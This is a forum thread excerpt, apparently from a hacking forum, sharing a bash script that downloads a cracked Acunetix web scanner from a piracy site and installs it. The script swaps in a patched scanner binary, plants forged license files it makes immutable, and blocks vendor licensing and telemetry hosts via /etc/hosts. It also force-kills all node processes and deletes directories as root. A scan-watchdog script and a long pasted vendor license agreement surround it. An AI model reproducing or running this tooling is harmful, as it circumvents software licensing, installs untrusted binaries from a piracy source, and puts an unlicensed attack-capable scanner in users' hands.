        response = session.post(api_url, timeout=30)
        response.raise_for_status()
        print(f"    [+] Successfully sent abort request for scan ID: {scan_id}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Failed to stop scan {scan_id}. Error: {e}")

def monitor_scans(config):
    base_url = f"{config['url']}:{config['port']}"
    headers = {
        "X-Auth": config['api_key'],
        "Content-Type": "application/json"
    }
    
    session = requests.Session()
    session.headers.update(headers)
    session.verify = False

    print(f"[*] Scan Monitor started.")
    print(f"[*] Checking every {CHECK_INTERVAL_MINUTES} minute(s).")
    print(f"[*] Stopping scans running longer than {MAX_SCAN_DURATION_HOURS} hour(s).")
    print("[*] Press CTRL+C to stop the monitor.")

    while True:
        try:
            print("\n" + "="*60)
            print(f"[*] [{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] Checking for running scans...")

            running_scans = get_running_scans(session, base_url)

            if not running_scans:
                print("[*] No scans are currently running.")
            else:
                print(f"[*] Found {len(running_scans)} running scan(s). Analyzing durations...")
                now_utc = datetime.now(timezone.utc)

                for scan in running_scans:
                    scan_id = scan.get('scan_id')
                    target_info = scan.get('target', {})
                    target_address = target_info.get('address', 'N/A')
                    
                    start_date_str = scan.get('current_session', {}).get('start_date')

                    if not start_date_str:
                        print(f"    [!] Could not determine start time for scan ID: {scan_id}. Skipping.")
                        continue

                    start_time = datetime.fromisoformat(start_date_str.replace('Z', '+00:00'))
                    
                    duration = now_utc - start_time
                    duration_hours = duration.total_seconds() / 3600
                    duration_minutes = duration.total_seconds() / 60

                    print(f"    - Scan ID: {scan_id} ({target_address})")
                    print(f"      - Running for: {duration_minutes:.2f} minutes ({duration_hours:.2f} hours)")

                    if duration_hours > MAX_SCAN_DURATION_HOURS:
                        print(f"    [!] ALERT: Scan {scan_id} has exceeded the {MAX_SCAN_DURATION_HOURS}-hour limit.")
                        stop_scan(session, base_url, scan_id, target_address)
                    else:
                        print("      - Status: Within time limit. OK.")
            
            print("="*60)
            print(f"[*] Next check in {CHECK_INTERVAL_MINUTES} minute(s)...")
            time.sleep(CHECK_INTERVAL_MINUTES * 60)

        except KeyboardInterrupt:
            print("\n[+] Monitor stopped by user. Exiting.")
            break
        except Exception as e:
            print(f"\n[!] An unexpected error occurred: {e}")
            print(f"[*] Retrying in {CHECK_INTERVAL_MINUTES} minute(s)...")
            time.sleep(CHECK_INTERVAL_MINUTES * 60)

if __name__ == "__main__":
    banner = r"""
  ,d88b.d88b,         
  88888888888         
  `Y8888888Y'  AcuMonitor - Acunetix Scan Watchdog
    `Y888Y'    Monitors and stops long-running scans.
      `Y'      Coded by MrDark
    """
    print(banner)
    
    config = load_config()
    monitor_scans(config)

 

[axelrode]

The script extracts the private api keys (stripe, paypal.....)??

 

[MrDark]

The script extracts the private api keys (stripe, paypal.....)??

No, it does not.

 

[MrDark]

Created a bash script for Linux that will automatically download, install, reinstall ( if already installed ) acunetix and apply the crack.
The script works only in Linux.

Thanks to https://t.me/Pwn3rzs for cracking acunetix.

How to use?
Create script.sh add the code in it and run chmod +x script.sh , after run ./script.sh and everything will be done automatically. The only thing you need to enter is your email login for acunetix web panel that you will lose to login and password.

#Updated the script for some bugfixes.

script.sh:

#!/bin/bash
# With love by MrDark @ xss.pro
# Acunetix Complete Installation/Reinstallation Script
# If acunetix is already installed, this will uninstall, clean, and reinstall everything properly
## If acunetix is not installed, this will download, extract, install and apply crack automatocally.

set -e  # Exit on any error

# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# Configuration
DOWNLOAD_URL="https://pwn3rzs.co/scanner_web/acunetix/Acunetix-v25.1.250204093-Linux-Pwn3rzs-CyberArsenal.7z"
ARCHIVE_PASSWORD="Pwn3rzs"
INSTALL_DIR="/root/acu"  # Fixed path to where files actually are

echo -e "${YELLOW}Acunetix Complete Reinstallation Script${NC}"
echo -e "${YELLOW}========================================${NC}"
echo -e "${RED}WARNING: This will completely remove and reinstall Acunetix${NC}"
echo

# Get admin credentials
echo -e "${YELLOW}Please enter Acunetix admin credentials:${NC}"
echo -e "${YELLOW}These will be used to login to the Acunetix web panel after installation.${NC}"
echo -e "${YELLOW}The access URL will be provided at the end of the installation.${NC}"
echo
read -p "Email address: " USERNAME
read -s -p "Password: " PASSWORD
echo
read -s -p "Confirm password: " PASSWORD_CONFIRM
echo

# Validate passwords match
if [ "$PASSWORD" != "$PASSWORD_CONFIRM" ]; then
    echo -e "${RED}ERROR: Passwords do not match!${NC}"
    exit 1
fi

# Validate email format (basic check)
if ! echo "$USERNAME" | grep -q "@"; then
    echo -e "${RED}ERROR: Please enter a valid email address${NC}"
    exit 1
fi

echo -e "${GREEN}Credentials accepted!${NC}"

# *** FIXED EXTERNAL IP DETECTION ***
EXTERNAL_IP=$(curl -s https://ipinfo.io/ip || curl -s ifconfig.me)
echo -e "${GREEN}Detected external IP: $EXTERNAL_IP${NC}"

# Function to wait for service
wait_for_service() {
    local service_name=$1
    echo -e "${YELLOW}Waiting for $service_name to stabilize...${NC}"
    sleep 30
}

# COMPLETE UNINSTALLATION
echo -e "${RED}Step 1: Complete Uninstallation...${NC}"

# Stop services
echo -e "${YELLOW}Stopping Acunetix services...${NC}"
systemctl stop acunetix 2>/dev/null || true

# *** NEW: FULL AGGRESSIVE CLEANUP ***
echo -e "${YELLOW}Force-killing leftover Acunetix processes...${NC}"

pkill -f acunetix 2>/dev/null || true
pkill -f invicti 2>/dev/null || true
pkill -f wvsc 2>/dev/null || true
pkill -f "python3.*acunetix" 2>/dev/null || true
pkill -f "python3.*invicti" 2>/dev/null || true
pkill -f "node.*acunetix" 2>/dev/null || true

# 🔥 Full cleanup of any Acunetix-related or stuck backend processes

# Kill anything connected to port 3443 (including CLOSE_WAIT python3)
echo -e "${YELLOW}Cleaning port 3443...${NC}"
pids=$(lsof -t -i :3443 || true)
if [ -n "$pids" ]; then
    echo "Killing processes on port 3443: $pids"
    kill -9 $pids 2>/dev/null || true
fi
fuser -k 3443/tcp 2>/dev/null || true

# Extra python kills (rare backend leftovers)
pkill -9 -f "python3.*acunetix" 2>/dev/null || true
pkill -9 -f "python3.*invicti" 2>/dev/null || true

# Kill any orphaned python3 likely holding CLOSE_WAIT
for pid in $(ps aux | grep python3 | grep -v grep | awk '{print $2}'); do
    if lsof -p "$pid" 2>/dev/null | grep -q "3443"; then
        echo "Killing python3 process $pid holding port 3443"
        kill -9 "$pid" 2>/dev/null || true
    fi
done

# Extra node cleanup
pkill -9 -f node 2>/dev/null || true

# Kill any leftover wvsc threads
pkill -9 -f wvsc 2>/dev/null || true

# Final sweep: kill any process referencing Acunetix directories
pgrep -f "/home/acunetix" 2>/dev/null | xargs -r kill -9 2>/dev/null || true

sleep 1
# *** END FULL CLEANUP ***

# Remove immutable attributes from license files
echo -e "${YELLOW}Removing immutable attributes...${NC}"
chattr -i /home/acunetix/.acunetix/data/license/* 2>/dev/null || true

# Remove service
echo -e "${YELLOW}Removing service...${NC}"
systemctl disable acunetix 2>/dev/null || true
rm -f /etc/systemd/system/acunetix.service 2>/dev/null || true
systemctl daemon-reload

# Remove user and home directory
echo -e "${YELLOW}Removing user and files...${NC}"
userdel -r acunetix 2>/dev/null || true
rm -rf /home/acunetix 2>/dev/null || true

# Clean up any remaining files
echo -e "${YELLOW}Cleaning up remaining files...${NC}"
rm -rf /tmp/acunetix* 2>/dev/null || true
rm -rf /opt/acunetix* 2>/dev/null || true

echo -e "${GREEN}Uninstallation completed!${NC}"

# Check if we have the extracted files
echo -e "${GREEN}Step 2: Checking for installation files...${NC}"
if [ ! -d "$INSTALL_DIR" ] || [ ! -f "$INSTALL_DIR/acunetix_25.1.250204093_x64.sh" ]; then
    echo -e "${YELLOW}Installation files not found, downloading...${NC}"
 
    # Install dependencies
    apt update && apt install -y p7zip-full expect net-tools bzip2
 
    # Download and extract
    wget -O "Acunetix-v25.1.250204093-Linux-Pwn3rzs-CyberArsenal.7z" "$DOWNLOAD_URL"
    7z x "Acunetix-v25.1.250204093-Linux-Pwn3rzs-CyberArsenal.7z" -o"$INSTALL_DIR" -p"$ARCHIVE_PASSWORD" -y
else
    echo -e "${GREEN}Installation files found in $INSTALL_DIR${NC}"
fi

# Verify we have all necessary files
cd "$INSTALL_DIR"
if [ ! -f "wvsc" ] || [ ! -f "license_info.json" ] || [ ! -f "wa_data.dat" ]; then
    echo -e "${RED}ERROR: Required files (wvsc, license_info.json, wa_data.dat) not found!${NC}"
    exit 1
fi

echo -e "${GREEN}All required files found!${NC}"

# Add hosts entries
echo -e "${GREEN}Step 3: Adding hosts entries...${NC}"
# Backup original hosts file
cp /etc/hosts /etc/hosts.backup.$(date +%Y%m%d_%H%M%S)

# Remove existing Acunetix entries
sed -i '/Acunetix Blocking Entries/,/2607:f8b0:402a:80a::200e  telemetry.invicti.com./d' /etc/hosts

# Add new hosts entries
tee -a /etc/hosts > /dev/null << EOF

# Acunetix Blocking Entries
127.0.0.1  erp.acunetix.com
127.0.0.1  erp.acunetix.com.
::1  erp.acunetix.com
::1  erp.acunetix.com.

127.0.0.1  discovery-service.invicti.com
127.0.0.1  discovery-service.invicti.com.
::1  discovery-service.invicti.com
::1  discovery-service.invicti.com.

127.0.0.1  cdn.pendo.io
127.0.0.1  cdn.pendo.io.
::1  cdn.pendo.io
::1  cdn.pendo.io.

127.0.0.1  bxss.me
127.0.0.1  bxss.me.
::1  bxss.me
::1  bxss.me.

127.0.0.1  jwtsigner.invicti.com
127.0.0.1  jwtsigner.invicti.com.
::1  jwtsigner.invicti.com
::1  jwtsigner.invicti.com.

127.0.0.1  sca.acunetix.com
127.0.0.1  sca.acunetix.com.
::1  sca.acunetix.com
::1  sca.acunetix.com.

192.178.49.174  telemetry.invicti.com
192.178.49.174  telemetry.invicti.com.
2607:f8b0:402a:80a::200e  telemetry.invicti.com
2607:f8b0:402a:80a::200e  telemetry.invicti.com.
EOF

echo -e "${GREEN}Hosts entries added successfully${NC}"

# INSTALLATION
echo -e "${GREEN}Step 4: Installing Acunetix...${NC}"

# *** ENSURE EXPECT EXISTS ***
if ! command -v expect >/dev/null; then
    echo -e "${YELLOW}Installing expect...${NC}"
    apt update && apt install -y expect
fi

# Create expect script for installation - using single quotes to avoid expansion issues
cat > /tmp/acunetix_install.exp << 'EOF'
#!/usr/bin/expect -f
set timeout 1200

spawn bash acunetix_25.1.250204093_x64.sh

# Wait for initial prompt and press ENTER to continue
expect "press ENTER to continue"
sleep 1
send "\r"

# Handle the paged license agreement
set timeout 10
for {set i 0} {$i < 100} {incr i} {
    expect {
        -ex "Accept the license terms?" {
            sleep 1
            send "yes\r"
            break
        }
        -ex "Do you accept our license agreement?" {
            sleep 1
            send "yes\r"
            break
        }
        -ex "--More--" {
            sleep 0.5
            send " "
        }
        -ex "\\\[no\\\] >>>" {
            sleep 1
            send "yes\r"
            break
        }
        timeout {
            send " "
        }
        eof {
            puts "Reached end of file unexpectedly"
            exit 1
        }
    }
}

# Handle the hostname prompt
expect "Hostname \\\[*\\\]:"
sleep 1
send "$env(EXTERNAL_IP)\r"

# Handle username prompt
expect "Email:"
sleep 1
send "$env(USERNAME)\r"

# Handle password prompt
expect "Password:"
sleep 1
send "$env(PASSWORD)\r"

# Handle password confirmation
expect "Password again:"
sleep 1
send "$env(PASSWORD)\r"

# Wait for installation to complete
set timeout 300
expect eof
EOF

chmod +x /tmp/acunetix_install.exp

# Run the installation with environment variables
cd "$INSTALL_DIR"
EXTERNAL_IP="$EXTERNAL_IP" USERNAME="$USERNAME" PASSWORD="$PASSWORD" /usr/bin/expect -f /tmp/acunetix_install.exp

# Check if installation was successful
if [ ! -d "/home/acunetix/.acunetix" ]; then
    echo -e "${RED}ERROR: Acunetix installation failed!${NC}"
    exit 1
fi

echo -e "${GREEN}Installation completed successfully!${NC}"

# POST-INSTALLATION CONFIGURATION
echo -e "${GREEN}Step 5: Post-installation configuration...${NC}"

# Stop service
systemctl stop acunetix || true
wait_for_service "acunetix stop"

# Replace wvsc file
echo -e "${GREEN}Replacing wvsc file...${NC}"
cp wvsc /home/acunetix/.acunetix/v_250204093/scanner/wvsc
chown acunetix:acunetix /home/acunetix/.acunetix/v_250204093/scanner/wvsc
chmod +x /home/acunetix/.acunetix/v_250204093/scanner/wvsc

# Install licenses
echo -e "${GREEN}Installing licenses...${NC}"
mkdir -p /home/acunetix/.acunetix/data/license

chattr -i /home/acunetix/.acunetix/data/license/* 2>/dev/null || true
rm -f /home/acunetix/.acunetix/data/license/*

cp license_info.json /home/acunetix/.acunetix/data/license/
cp wa_data.dat /home/acunetix/.acunetix/data/license/

chown acunetix:acunetix /home/acunetix/.acunetix/data/license/license_info.json
chown acunetix:acunetix /home/acunetix/.acunetix/data/license/wa_data.dat
chmod 444 /home/acunetix/.acunetix/data/license/license_info.json
chmod 444 /home/acunetix/.acunetix/data/license/wa_data.dat

chattr +i /home/acunetix/.acunetix/data/license/license_info.json
chattr +i /home/acunetix/.acunetix/data/license/wa_data.dat

echo -e "${GREEN}Licenses installed successfully${NC}"

# Start service
echo -e "${GREEN}Starting Acunetix service...${NC}"
systemctl start acunetix
wait_for_service "acunetix start"

# Final status check
echo -e "${GREEN}Step 6: Final status check...${NC}"
systemctl status acunetix --no-pager

# Cleanup
rm -f /tmp/acunetix_install.exp

echo -e "${GREEN}================================${NC}"
echo -e "${GREEN}REINSTALLATION COMPLETED SUCCESSFULLY!${NC}"
echo -e "${GREEN}Acunetix is now fully configured and running${NC}"
echo -e "${GREEN}Access URL: https://$EXTERNAL_IP:3443${NC}"
echo -e "${GREEN}Username: $USERNAME${NC}"
echo -e "${GREEN}Password: [HIDDEN]${NC}"
echo
echo -e "${YELLOW}Use the credentials above to login to the Acunetix web panel.${NC}"
echo -e "${YELLOW}The web panel will be accessible via the Access URL shown above.${NC}"
echo -e "${GREEN}================================${NC}"

Output on success installation ( script will stop on any error, please report if any found, even tough i have tested it multiple times, everything should be good ):
( I have replaced admin email and server ip with ---hidden--- for security reasons in the output).

root@pptech:~# ./script.sh
Acunetix Complete Reinstallation Script
========================================
WARNING: This will completely remove and reinstall Acunetix

Please enter Acunetix admin credentials:
These will be used to login to the Acunetix web panel after installation.
The access URL will be provided at the end of the installation.

Email address: ---hidden---
Password:
Confirm password:
Credentials accepted!
Detected external IP: ---hidden---
Step 1: Complete Uninstallation...
Stopping Acunetix services...
Removing immutable attributes...
Removing service...
Removing user and files...
Cleaning up remaining files...
Uninstallation completed!
Step 2: Checking for installation files...
Installation files found in /root/acu
All required files found!
Step 3: Adding hosts entries...
Hosts entries added successfully
Step 4: Installing Acunetix...
spawn bash acunetix_25.1.250204093_x64.sh

Acunetix Installer Version: v_250204093, Copyright (c) Acunetix
------------------------------------------------------------

Checking os...
Warning: no dependencies configured.
Please read the following License Agreement. You must accept the terms of this
agreement before continuing with the installation.
press ENTER to continue
>>>
INVICTI SUBSCRIPTION SERVICES AGREEMENT

IMPORTANT - CAREFULLY READ ALL THE TERMS AND CONDITIONS OF THIS INVICTI SUBSCRIPTION SERVICES AGREEMENT ("SSA"). BY SIGNING AN ORDER FORM INCORPORATING THIS AGREEMENT, CLICKING "I A
CCEPT", CLICKING "CREATE", PROCEEDING WITH THE INSTALLATION AND/OR ACCESS AND USE OF THE INVICTI SOLUTION, OR USING THE INVICTI SOLUTION AS AN AUTHORIZED REPRESENTATIVE OF YOUR COMP
ANY NAMED ON THE APPLICABLE ORDER FORM ON WHOSE BEHALF YOU INSTALL AND/OR USE THE INVICTI SOLUTION, YOU ARE INDICATING THAT YOU HAVE READ, UNDERSTAND, AND ACCEPT THIS AGREEMENT WITH
 INVICTI (AS DEFINED BELOW). IF YOU DO NOT AGREE WITH ALL OF THE TERMS OF THIS AGREEMENT, DO NOT INSTALL, COPY, OR OTHERWISE USE THE INVICTI SOLUTION. THE EFFECTIVE DATE OF THIS AGR
EEMENT SHALL BE THE DATE THAT YOU SIGN AN ORDER FORM WITH INVICTI OR OTHERWISE ACCEPT THIS AGREEMENT AS SET FORTH ABOVE.

1. DEFINITIONS.

"Affiliates" means, with respect to a party at a given time, an entity that then is directly or indirectly controlled by, is under common control with, or controls that party, and h
ere "control" means an ownership, voting, or similar interest representing 50% or more of the total interests then outstanding of that entity.

"Agreement" means the applicable Order Form and this SSA (including any terms incorporated by reference in the SSA) which govern the provision of the Invicti Solution and Support pr
ovided to Customer or the Customer's Affiliate.

"AUP" means Invicti's Acceptable Use Policy (presently found at the following URL: https://www.invicti.com/Legal/aup) as may be periodically updated by Invicti.

"Business Days" means Monday through Friday, excluding public holidays in the country whose laws govern the Agreement.

"Cloud Service" means the Invicti proprietary software as a service provided for use over the internet and any and all modified, updated, or enhanced versions thereof that Invicti m
ay provide to Customer or its Users.

"Customer" means the entity utilizing the Invicti Solution and on behalf of which this SSA is agreed.

"Customer Data" means data, files, or information uploaded by Customer or Customer's Users into the Cloud Services or as otherwise hosted by Invicti.

"Documentation" means the operating instructions, user manuals, product specifications, "read-me" files, and other documentation that Invicti makes available to Customer in hard cop
y or electronic form for the Invicti Solution, including any modified, updated, or enhanced versions of such documentation.

"Intellectual Property Rights" means all intellectual property rights, including copyrights, trademarks, service marks, trade secrets, patents, patent applications, moral rights, an
d all other proprietary rights, whether registered or unregistered.

"Invicti" means the Invicti entity identified on an Order Form, or if none is identified: (i) if Customer's primary billing address is located in the United States, Latin America, o
r Canada ("North America"), Invicti Security Corp., a Florida corporation with principal place of business at 1000 N. Lamar Blvd., Ste. 300, Austin, TX 78703; or (ii) if Customer's
primary billing address is located outside of North America, Invicti Security Ltd., a limited liability company registered in Malta with principal place of business at Mirabilis Bui
lding, Triq L - Intornjatur, Mriehel, CBD 3050, Malta.

"Invicti Solution" means Invicti's proprietary programs made available to Customer as the Software or Cloud Service, including without limitation its features, functions, user inter
face, and related Support services (each as defined below), as specified on an Order Form.

"Open Source Software" means computer software for which the source code is freely available according to the specific license under which that software is distributed.

"Order Form" means an order form or other ordering document entered into between Customer and Invicti or an Invicti Affiliate for Customer's purchase of the Invicti Solution or othe
r services from Invicti.

"Software" means the Invicti proprietary software provided in executable code form and any and all modified, updated, or enhanced versions thereof that Invicti may provide to Custom
er or its Users.

"Subscription" means a subscription purchased by Customer to access and use the Invicti Solution and to receive Support during the applicable Subscription Term.

"Subscription Term" means the contract term for Customer's access and use of the Invicti Solution as set forth on the applicable Order Form.

"Support" means the standard maintenance or support services provided by Invicti for the Invicti Solution as further set forth in Exhibit A.

"Usage Parameters" means the maximum number of permitted web application scan targets using the Invicti Solution as specified on an Order Form, and any other parameters specified in
 the Documentation, Order Form, or other writing by Invicti regarding the scope of use of the Invicti Solution by Customer or its Users.

"User(s)" means Customer's employees, contractors, or agents (including those of Customer's Affiliates) who are authorized by the Customer to use the Invicti Solution.

2. ORDERS.

2.1. Formation. This SSA governs the overall relationship of the parties in relation to Customer's use of the Invicti Solution. Customer is not permitted to use the Invicti Solution
 until it has recorded its consent consented to this SSA, either via click-through or via Order Form. Each executed Order Form creates a separate Agreement between Invicti and Custo
mer.

2.2. Informal. Provision of the Invicti Solution, Support, or any other products or services provided by Invicti or its Affiliate to Customer or its Affiliates is governed by this S
SA unless otherwise expressly and conspicuously agreed in writing by the parties.

2.3. Affiliate Orders. If an Order Form incorporating this SSA is executed by a party Affiliate, the terms "Customer" and "Invicti", as used in this SSA, shall be read to mean (resp
ectively) the applicable Customer Affiliate and/or Invicti Affiliate that executed the applicable Order Form.

3. INVICTI SOLUTION.

3.1. License Grant.  Subject to Customer's compliance with the terms and conditions of the Agreement, including payment of all applicable fees, Invicti hereby grants to Customer for
 its internal business purposes a limited, non-sublicensable, non-exclusive, non-transferable, worldwide license, solely during the Subscription Term or Trial Period (defined below)
, as applicable and as set forth in the Order Form, to:

(A) either:

(i) install, execute, and use, or permit Users to install, execute, and use, in object code form only, the Software on Customer-provided infrastructure; or

(ii) access and use the Cloud Service; and

(B) reproduce and use a reasonable number of copies of the Documentation for use with the Invicti Solution.

3.2. Trial Versions and Beta Features. Invicti will have no liability under the Agreement (including any indemnification obligations) arising out of or related to any use of a Trial
 Version or Beta Feature by Customer. Any use of a Trial Version or Beta Feature will be solely at Customer's own risk and may be subject to additional requirements as specified by
Invicti. Invicti is not obligated to provide Support for any Trial Version or Beta Feature, and all Trial Versions or Beta Features are provided as-is without warranty of any kind.
Customer agrees to use the Trial Version in a non-production environment. "Trial Version(s)" means any Invicti Solution version that is provided by Invicti on a "Trial", "Evaluation
", or "Proof of Concept" basis whether or not identified as such by Invicti on an Order Form.  Invicti will provide the Trial Version free of charge for a time period of 15 business
 days ("Trial Period"), and Customer acknowledges and agrees that if Customer has not purchased a Subscription prior to the expiration of the Trial Period, then the Agreement will a
utomatically terminate.  "Beta Feature(s)" means any Invicti Solution feature that is identified by Invicti, including via the applicable Invicti Solution user interface or via othe
r communications to Customer, as "Beta", "Alpha", "Experimental", "Limited Release" or "Pre-Release" or that is otherwise identified by Invicti as unsupported.  Invicti may, in its
sole discretion: (i) cease providing Beta Features at any time; or (ii) cease providing Beta Features free of charge and require Customer to purchase such features for continued use
 as part of the Invicti Solution.  Customer will not attempt to circumvent, dismantle, or otherwise interfere with any time-control disabling functionality in any Trial Version or B
eta Feature that causes the Trial Version or Beta Feature to cease functioning.

3.3. Support.  Unless otherwise upgraded under an applicable Order Form, Support for the Invicti Solution is provided in accordance with the Standard Support Terms (presently found
at the following URL: https://www.invicti.com/Legal/standard-support), as may be periodically updated by Invicti.

4. ADDITIONAL CUSTOMER RESPONSIBILITIES. Customer: (i) must keep its passwords secure and confidential and use industry-standard password management practices; (ii) is solely respon
sible for the content of the Customer Data and all activity conducted through its account within the Cloud Service; (iii) must use commercially reasonable efforts to prevent unautho
rized access to its account and notify Invicti promptly of any such unauthorized access; (iv) may use the Invicti Solution only in accordance with the Documentation and applicable l
aw; (v) is responsible for its Users' compliance with the terms of the Agreement; (vi) must not exceed the Usage Parameters; and (vii) will at all times comply with the AUP.

5. FEES AND PAYMENT.

5.1. Subscription Fees. Fees are due and payable as set forth on the Order Form, and Customer shall timely pay all fees. Payment obligations are non-cancelable, and fees paid are no
n-refundable. All payments shall be made in the currency stated on the Order Form. There will be no fee increases during Customer's Subscription Term; however, Customer's fees are s
ubject to increase upon renewal (including any auto-renewal), following expiration of the then-current Subscription Term. Customer may submit a request to increase Usage Parameters
at any time, and, upon execution of an Order Form, Customer will pay fees due for such increase at a prorated amount for the remainder of Customer's then-current Subscription Term.
Any Order Form for such an increase will renew concurrently with Customer's then-current Subscription Term for a period equal to Customer's initial Subscription Term.

5.2. Taxes. Subscription fees are exclusive of Taxes. Customer must pay to the relevant taxing authorities or reimburse Invicti, as applicable, all Taxes arising out of the transact
ions contemplated by the Agreement.  If Customer is required to pay or withhold any Taxes for payments due under the Agreement, Customer must gross up its payments so that Invicti r
eceives all sums due in full and free of any deductions. "Taxes" means any sales, VAT (value-added tax), GST (goods and services tax), use, gross receipts, business and occupation,
and other taxes (other than taxes on our income), export and import fees, customs duties, and similar charges imposed by any government or other authority.

6. CONFIDENTIAL INFORMATION. Invicti's Confidential Information includes, without limitation, the Invicti Solution and any non-public technical, business, and pricing information. C
onfidential Information does not include information that: (i) is or becomes generally known to the public through no fault or breach of the Agreement by Recipient; (ii) is rightful
ly known by Recipient at the time of disclosure without an obligation of confidentiality; (iii) is independently developed by Recipient without the use of Discloser's Confidential I
nformation; or (iv) Recipient rightfully obtains from a third party without restriction on use or disclosure.  Recipient will maintain the confidentiality of Confidential Informatio
n, and Recipient agrees not to use such Confidential Information for any purpose except as necessary to fulfill its obligations and exercise its rights under the Agreement.  Recipie
nt will protect the secrecy of and prevent disclosure and unauthorized use of Discloser's Confidential Information using the same degree of care that it takes to protect its own con
fidential information and will in no event use less than reasonable care.  Recipient may share Discloser's Confidential Information with its employees, contractors, directors, agent
s, and representatives who have a need to know the information to perform obligations under the Agreement, and with whom Recipient has written obligations on confidentiality in plac
e at least as stringent as those in the Agreement. Recipient may disclose Discloser's Confidential Information if required by judicial or administrative process, provided that Recip
ient first provides Discloser with prompt notice of such required disclosure to enable the Discloser to seek a protective order, unless such notice is prohibited by applicable law.
 "Confidential Information" means any proprietary information disclosed by one party ("Discloser") and received by the other party ("Recipient") during, or prior to entering into, t
he Agreement that Recipient should know is confidential or proprietary based on the circumstances surrounding the disclosure.

7. RESTRICTIONS.  Except as expressly set forth in the Agreement, and to the maximum extent permitted by applicable law, Customer will not (and will not allow any third party to): (
i) decompile, disassemble, reverse engineer, or otherwise attempt to derive the structure of the Invicti Solution or the source code from the Invicti Solution; (ii) distribute, lice
nse, sublicense, assign, transfer, provide, lease, lend, rent, disclose, use for timesharing or service bureau purposes, or otherwise use for the benefit of any third party the Invi
cti Solution (iii) use or access the Invicti Solution in order to build a similar or competitive product or service or to disclose to any third party any benchmarking or comparative
 study involving the Invicti Solution; (iv) modify, adapt, translate, or create derivative works of the Invicti Solution or Documentation; or (v) remove, alter, or obscure in any wa
y any proprietary rights notices (including copyright notices) of Invicti or its suppliers on or within the Invicti Solution or Documentation.

8. TERM AND TERMINATION.

8.1. Term.  Subject to the termination rights set forth herein, the term of this SSA will commence on the Effective Date and will continue as long as the Invicti Solution is being p
rovided to Customer under an Order Form.  Unless otherwise agreed in the Order Form, the Subscription Term will automatically renew for successive terms equal in duration to the ini
tial Subscription Term unless either party gives the other party written notices of non-renewal not less than 30 calendar days before the expiration of the then-current Subscription
 Term.

8.2. Mutual Termination for Material Breach. Either party may terminate an affected Order Form or all Order Forms between Invicti and Customer immediately without further notice if
the other party materially breaches its obligations under the Agreement and does not remedy such breach within 30 calendar days of receiving written notification to do so from the n
on-breaching party.

8.3. Termination for Dissolution, Bankruptcy. Subject to applicable law, either party may immediately terminate the SSA and/or any Order Form on written notice if the other party en
ters into compulsory or voluntary liquidation, ceases to carry on business, or takes or suffers any similar action which the other party reasonably believes means that it may be una
ble to pay its debts.

8.4. Effect of Termination.

(A) Upon the termination of an applicable Order Form: (i) the licenses granted under the Order Form for the Invicti Solution will immediately terminate, and Customer and its Users w
ill immediately cease use of the Invicti Solution; (ii) Invicti's obligations to provide Support will immediately terminate; (iii) in the event of a termination for Customer's breac
h of the Agreement, Customer will pay to Invicti the full amount of any outstanding fees due hereunder; (iv) in the event of a termination for Invicti's breach of the Agreement, Inv
icti will refund to customer the pro-rata amount of any prepaid but unused fees; (v) for Cloud Service Customers, Customer may request that Invicti delete the Customer Data; and (vi
) on Customer's request, Invicti will destroy or return all Customer Confidential Information in its possession or control and will not make or retain any copies of such information
 in any form, except that Invicti may retain one archival copy of such information solely for the purposes of ensuring compliance with the Agreement or as required by applicable law
 or regulation.

(B) CUSTOMER ACKNOWLEDGES AND AGREES THAT THE INVICTI SOLUTION MAY CONTAIN DISABLING CODE THAT (EITHER AUTOMATICALLY OR AT INVICTI'S CONTROL) WILL RENDER THE INVICTI SOLUTION (AND R
ELATED DATA) UNUSABLE UPON TERMINATION OR CUSTOMER'S BREACH OF THE AGREEMENT AND FAILURE TO CURE WITHIN 30 DAYS OF RECEIVING NOTICE OF SUCH BREACH FROM INVICTI.

(C) The following sections will survive any termination or expiration of the Agreement: 1, 6, 7, 8, 9, 10, 11, 12, 13, and 18.

(D) Termination of this SSA will prevent Customer from renewing and placing additional Order Forms with Invicti, however it will not affect the operation any Order Form then in effe
ct. Each Order Form must independently terminate.

(E) Expiration or termination of all or part of the Agreement shall not affect any accrued rights, remedies, obligations, or liabilities of the parties.

9. PROPRIETARY RIGHTS. Invicti retains all right, title, and interest in and to all Intellectual Property Rights held by Invicti (and its licensors). Title to the Invicti Solution w
ill not pass from Invicti to Customer, and the Invicti Solution and all copies thereof will at all times remain the sole and exclusive property of Invicti.

10. CUSTOMER DATA & DATA SECURITY.

10.1. Customer Data. All Customer Data remains the property of Customer. Customer represents and warrants to Invicti that Customer has provided all required notices and has obtained
 all required licenses, permissions, and consents regarding Customer Data for use within the Invicti Solution. Customer grants Invicti the right to use the Customer Data solely for
purposes of performing under the Agreement. The parties agree that the security requirements stated in section 10.2 are the only contractual requirements that Invicti has with respe
ct to the handling, use, and security of Customer Data.

10.2. Data Security Measures and Data Processing Addendum.

(A) Security Measures. Invicti: (i) implements and maintains reasonable security measures appropriate to the nature of the Customer Data including, without limitation, technical, ph
ysical, administrative, and organizational controls designed to maintain the confidentiality, security, and integrity of  Customer Data; (ii) implements and maintains industry stand
ard systems and procedures for detecting, preventing, responding to attacks, intrusions, or other systems failures and regularly tests or otherwise monitors the effectiveness of the
 safeguards' key controls, systems, and procedures; (iii) designates an employee or employees to coordinate implementation and maintenance of its security measures (as defined below
); and (iv) identifies reasonably foreseeable internal and external risks to the security, confidentiality, and integrity of Customer Data that could result in the unauthorized disc
losure, misuse, alteration, destruction, or other compromise of such information

(B) Data Processing Addendum.  When legally required, the parties agree to enter into and comply with the terms of Invicti's Data Processing Addendum (presently found at the followi
ng URL: https://www.invicti.com/Legal/data-protection-policy) as may be periodically updated by Invicti.

10.3. Statistical Data. Invicti may compile statistical information related to the performance and Customer's usage of the Invicti Solution and may make such information available f
or marketing and promotional purposes, provided that such information is aggregated and anonymized. Invicti retains all intellectual property rights in such statistical information.

11. WARRANTIES & DISCLAIMERS.

11.1. Warranty.

(A) Invicti warrants that:

(i) it will not materially decrease the overall security of the Invicti Solution;

(ii) it will not materially decrease the overall functionality of the Invicti Solution;

(iii) the Invicti Solution will perform substantially in conformance with the Documentation;

(iv) it will maintain all necessary licenses, consents, and permissions for performance of its obligations under the Agreement; and

(v) it uses commercially reasonable efforts consistent with industry standards to regularly scan for and remove any "Malware" from the Invicti Solution. "Malware" means software pro
grams designed to damage or do other unwanted actions on a computer system, including viruses, worms, Trojan Horses, and spyware.

